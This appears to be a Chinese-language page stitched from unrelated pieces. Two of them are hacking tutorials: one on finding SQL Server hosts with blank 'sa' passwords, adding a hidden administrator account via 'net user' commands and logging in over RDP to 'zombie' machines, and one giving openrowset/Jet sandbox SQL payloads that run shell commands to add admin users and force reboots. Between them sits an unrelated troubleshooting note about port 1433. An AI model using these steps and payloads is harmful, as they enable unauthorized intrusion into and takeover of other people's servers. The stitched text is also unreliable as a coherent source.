SQL Server使用的1433端口，其中Sa权限为最高权限，我们就是利用肉鸡Sa口令漏洞来入侵的，而一般开1433端口的大多是服务器，所以很受大家的“喜爱”！工具：scannerX-Scan-v3.3SQL综合利用工具在百度搜索，一般都有下载，注意去大型正规网站，并且杀毒！！！需要记住的命令：建立用户net user 帐户密码/add （注意空格，帐户密码自己设置）例如：net user TT86 123 /add （帐户TT86 密码123）把帐户提生为管理员组net localgroup administrators 帐户/add一样：net localgroup administrators TT86 /add （把TT86帐户提升为管理员）正式开始首先，我们用scanner扫描IP，端口设置为1433（看图）将开放1433端口的IP保存，再重新导入scanner扫描3389端口，我们的目的始终利用到3389端口了。

将同时开放1433 3389端口的IP保存起来打开X-Scan-v3.3导入IP参数设置选择几个有用的（看图）扫描结束后点漏洞问题一般会有SQL-Server弱口令:"sa/[空口令]"复制有漏洞的IP打开SQL综合利用工具连接打开利用目录选择执行DOS命令（看图）先执行这个建立用户net user a a /add然后把A用户提生为管理员组net localgroup administrators a /add 自己建立自己的帐号，建立好后会显示执行成功好了，现在我们在肉鸡的电脑里就建立了一个帐户了再就是使用3389端口连接，使用我们刚才建立的帐户登陆吧！其他的放木马什么就不用教了吧！呵呵！就这么简单，祝大家运气好点，顺利的找到肉鸡！。

这篇文章主要针对Win2003系统安装SQL Sever2000后1433端口未开放，如何打开1433端口的解决方法。

用了几年的Windows2003和SQL Server2000了，不过这个问题倒是头次遇到。

最近调试一个JSP+SQL2000WEB程序遇到个现象，在Win2003简体中文服务器版上安装SQL Server2000，默认安装，一切正常，但是在安装完成后Tomcat运行正常，JSP程序却无法连接SQL2000数据库，查看端口，1433端口居然未开放，当然更不用说远程连接了。

一般分析的都是这样：1、sql server服务没有启动；检查服务启动，重新启动服务故障依然。

2、修改了端口号；打开网络实用工具，检查启用的协议中有TCP/IP协议，查看端口，是1433没错。

3、客户端实用工具作了改动；打开客户端实用工具，检查协议端口正常，重新创建一个别名，依然不行。

4、安装的问题；怀疑安装步骤有问题。

遂卸载重装，一切默认，故障依然。

5、安装版本的问题；查看安装光盘，是久经考验的安装盘，应该不会出问题。

6、系统的问题；也看不出有什么其它的问题，难道是系统的问题？不过重装系统可太过麻烦，还是先想想其它的办法，看能不能找到问题所在。

检查系统日志，这个应该是一个比较好的习惯。

仔细翻了一遍重新安装后的日志，赫然发现如下内容：您运行的Microsoft SQL Server 2000 版本或Microsoft SQL Server 2000 Desktop Engine (也称为MSDE) 和Microsoft Windows Server 2003 家族使用时存在已知的安全弱点。

为了减少计算机被某些病毒的攻击，Microsoft SQL Server 2000，MSDE 或两者的TCP/IP和UDP 网络端口被禁用。

要启用这些端口，您必须从/sql/downloads/default.asp 或/china/sql/downloads/default.asp安装一个修补程序，或Microsoft SQL Server 2000 或MSDE 的最新服务包。

1433之黑吃黑杀手锏-沙盒模式提权1433好扫，但是难入侵啊!不是127错误，就是命令被禁用。

不是缺少哪个DLL文件，就是126错误。

哈，甚至连映像劫持、asshell、jobshell、seshell全部都使用不了，甚至SQL语句读写注册表都不行，该如何办?或许你忽略了一招你们忘记了沙盒模式的威力。

其实很多人也知道沙盒模式，但是没有深究。

所以忽视了它。

下面我介绍它：select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\syst em32\ias\ias.mdb','select shell("cmd.exe /c net user user pass /add")')先看这个语句什么意思：意思是用SQL语句执行c:\windows\system32\ias\ias.mdb这个文件，来执行cmd.exe 来添加一个user 的用户。

但很多时候cmd被禁用了，所说当你执行这个语句的时候，会显示：无效的调用。

但如果cmd被禁，那接下来该怎么办你可以这样去尝试：select * fromem32\ias\ias.mdb','select shell("net user user pass /add")')现在没用cmd.exe了直接利用c:\windows\system32\ias\ias.mdb来调用net 来添加用户。

在net.exe没被禁用的情况下，很多的机子是可以添加成功的，接下来select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\syst em32\ias\ias.mdb','select shell("net localgroup administrators user /add")') 就OK了如果调用net(或net1)成功，但是用user用户登陆不了，那你可以重启系统试试语句可以这样写select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\syst em32\ias\ias.mdb','select shell("shutdown -r -f -t 0")')重启以后再添加一次用户。